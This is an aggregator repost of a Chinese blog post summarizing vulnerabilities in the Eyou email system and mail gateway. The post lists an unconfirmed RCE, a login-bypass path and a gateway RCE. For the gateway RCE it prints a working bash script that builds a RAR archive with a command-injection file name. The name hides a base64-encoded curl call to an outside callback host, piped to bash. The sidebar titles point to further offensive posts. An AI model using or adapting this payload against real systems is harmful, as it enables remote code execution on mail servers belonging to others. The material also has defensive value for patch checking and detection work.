惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

博客园 - 三生石上(FineUI控件)
博客园 - 叶小钗
博客园 - 聂微东
博客园 - 司徒正美
Hugging Face - Blog
Hugging Face - Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
Google DeepMind News
Google DeepMind News
Recent Announcements
Recent Announcements
IT之家
IT之家
J
Java Code Geeks
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
I
InfoQ
爱范儿
爱范儿
Vercel News
Vercel News
Apple Machine Learning Research
Apple Machine Learning Research
阮一峰的网络日志
阮一峰的网络日志
博客园 - Franky
U
Unit 42
酷 壳 – CoolShell
酷 壳 – CoolShell
腾讯CDC
F
Fortinet All Blogs
V
Visual Studio Blog
人人都是产品经理
人人都是产品经理

博客园 - r1ch4rd_L

RAX3000Z路由器开启telnet功能并在互联网侧实现持久化控制 内网搭建KMS激活windows与office “Chrome139.0.7258.128版本GPU硬件加速错误导致UI加载失败”问题临时解决方案 明源相关漏洞自查清单(2025) 用友相关漏洞自查表(2025年) 突发,广东广州电信把github地址解析成为127.0.0.1 Sysmon立大功,分析短进程,阻止右下角芒果TV弹框 分析一个Steam钓鱼骗局,附带相关恶意样本 分析一个steam假入库行为,附带相关恶意样本 辣鸡CSDN 捕获挖矿脚本分析 apache2.4.49RCE漏洞抓鸡(CVE-2021-41773_CVE-2021-42013) 多种shiro利用方式总结 【钓鱼可用】文件名反转字符串 SonicWALL SSL-VPN Web Server Vulnerable Exploit - r1ch4rd_L ES文件浏览器4.1.9.7.4任意文件浏览漏洞 SUID提权之python的os.setuid(0)提权 PHP-8.1.0-dev 后门命令执行 windows命令行工具导出系统日志——wevtutil 金蝶EAS接口未授权 (蓝队4月10日捕捉疑似0day)
亿邮相关漏洞总结
r1ch4rd_L · 2025-07-27 · via 博客园 - r1ch4rd_L

亿邮相关漏洞总结

  1. 亿邮电子邮件系统远程命令执行漏洞

    1.   疑似0day,未知详情
  2. 亿邮电子邮件系统认证逻辑缺陷

    1.   利用路径:/?q=login.do
  3. 亿邮邮件网关 RCE

    1. 利用路径:/usr/local/eyou/gateway/ebaselib/bin/pdftotext
    2. 验证方式:
      #!/bin/bash
      PAYLOAD_NAME="testpoc.pdf\`{echo Y3VybCBodHRwOi8vc2R5eWE0Mm4uZG5zLmFkeXNlYy5jb20K}|{base64 -d}|bash\`"
      WORKDIR=$(mktemp -d)
      cd "$WORKDIR" || exit 1
      echo -n "12345" > "$PAYLOAD_NAME"
      OUTPUT_RAR="payload_testpoc.rar"
      rar a -ma5 -m0 -ep "$OUTPUT_RAR" "$PAYLOAD_NAME"
      mv "$OUTPUT_RAR" "$OLDPWD"
      echo "[+] Done: $OUTPUT_RAR created."
      rm -rf "$WORKDIR"

posted @ 2025-07-27 08:41  r1ch4rd_L  阅读(630)  评论()    收藏  举报